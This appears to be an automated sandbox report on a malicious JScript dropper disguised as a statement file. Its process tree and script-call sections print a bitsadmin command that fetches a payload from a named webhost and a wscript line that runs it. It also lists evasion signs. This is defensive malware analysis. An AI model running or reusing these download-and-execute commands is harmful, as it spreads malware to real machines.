Edit tour

Windows Analysis Report
New_Statement-8723107.js

Overview

General Information

Sample name:	New_Statement-8723107.js
Analysis ID:	1524248
MD5:	e435fc1fc9a3a3fb5133758ab9ea7e85
SHA1:	c59f9c185c510fa8458b1a84594107c77b7a1222
SHA256:	9bd5b1deaeb42874154d08cf30c677b22b028a880aaa1e0e51eb7955ba44f162
Tags:	jsuser-N3utralZ0ne
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

JScript performs obfuscated calls to suspicious functions

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Process Parents

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Tries to download files via bitsadmin

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

Process Tree

System is w10x64

wscript.exe (PID: 3328 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

bitsadmin.exe (PID: 6324 cmdline: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110 C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq MD5: 01AAB62D5799F75B0D69EB29C1CA6855)

conhost.exe (PID: 6240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wscript.exe (PID: 3196 cmdline: "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq MD5: A47CBE969EA935BDD3AB568BB126BC80)

svchost.exe (PID: 5560 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Sigma Signatures

System Summary

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq, CommandLine: "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3328, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq, ProcessId: 3196, ProcessName: wscript.exe

Sigma detected: Suspicious Process Parents

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110 C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq, ParentImage: C:\Windows\System32\bitsadmin.exe, ParentProcessId: 6324, ParentProcessName: bitsadmin.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 6240, ProcessName: conhost.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq, CommandLine: "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3328, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq, ProcessId: 3196, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js", ProcessId: 3328, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js", ProcessId: 3328, ProcessName: wscript.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5560, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: unknown

HTTPS traffic detected: 145.14.145.39:443 -> 192.168.2.6:49715 version: TLS 1.2

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: aeroox.000webhostapp.com
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa

Source: svchost.exe, 00000004.00000002.3507582577.00000207FC8A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.4.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: wscript.exe, wscript.exe, 00000001.00000003.2586860487.0000020424D9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aeroox.000webhostapp.com/dov/010111100110101
Source: bitsadmin.exe, 00000002.00000002.2586300092.00000191D1D20000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3506655448.00000207F72AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3506935629.00000207F7B02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3507582577.00000207FC884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3507448837.00000207FC800000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110
Source: svchost.exe, 00000004.00000002.3506385344.00000066C71FB000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3507840524.00000207FCA50000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2297842973.00000207FC6E1000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	String found in binary or memory: https://aeroox.000webhostapp.com/dov/0101111001101011010011111111010110111001010111101C:
Source: bitsadmin.exe, 00000002.00000002.2586300092.00000191D1D28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110C:
Source: bitsadmin.exe, 00000002.00000002.2586300092.00000191D1D28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110ttC:
Source: svchost.exe, 00000004.00000002.3507582577.00000207FC862000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aeroox.000webhostapp.com:443/dov/010111100110101101001111111101011011100101011110
Source: edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000004.00000003.2235150076.00000207FC6E0000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:

Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715

Source: unknown

HTTPS traffic detected: 145.14.145.39:443 -> 192.168.2.6:49715 version: TLS 1.2

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: New_Statement-8723107.js

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal72.evad.winJS@7/3@2/2

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6240:120:WilError_03

Source: C:\Windows\System32\svchost.exe

File created: C:\Users\user\AppData\Local\Temp\BITE86B.tmp

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\New_Statement-8723107.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110 C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq
Source: C:\Windows\System32\bitsadmin.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110 C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\bitsadmin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\bitsadmin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\bitsadmin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\bitsadmin.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: CreateTextFile("Z:\syscalls\6024.js.csv");IWshShell3._00000000();ITextStream.WriteLine(" entry:89 o: f:run a0:%22bitsadmin%20%2Ftransfer%208%20https%3A%2F%2Faeroox.000webhostapp.com%2Fdov%2F010111100110101101001111111101011011100101011110%20%25Temp%25%5Cajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvl");IWshShell3.Run("bitsadmin /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101", "0", "true");IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\6024.js.csv");IWshShell3._00000000();ITextStream.WriteLine(" entry:89 o: f:run a0:%22bitsadmin%20%2Ftransfer%208%20https%3A%2F%2Faeroox.000webhostapp.com%2Fdov%2F010111100110101101001111111101011011100101011110%20%25Temp%25%5Cajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvl");IWshShell3.Run("bitsadmin /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101", "0", "true");IWshShell3._00000000();ITextStream.WriteLine(" exit:89 o: f:run r:-2145844824");IWshShell3._00000000();ITextStream.WriteLine(" entry:98 o: f:run a0:%22wscript%20%2F%2FE%3AVBScript%20%25Temp%25%5Cajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq%22");IWshShell3.Run("wscript //E:VBScript %Temp%\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq")

Persistence and Installation Behavior

Tries to download files via bitsadmin

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110 C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/dov/010111100110101101001111111101011011100101011110 C:\Users\user\AppData\Local\Temp\ajvquvbasrwfjlqytlcygpojngopsizuvzazhztrgwuzenrvcowyckqifvlyymrthzujtfjxgdigjq			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Source: C:\Windows\System32\svchost.exe TID: 3428

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: svchost.exe, 00000004.00000002.3506553730.00000207F722B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
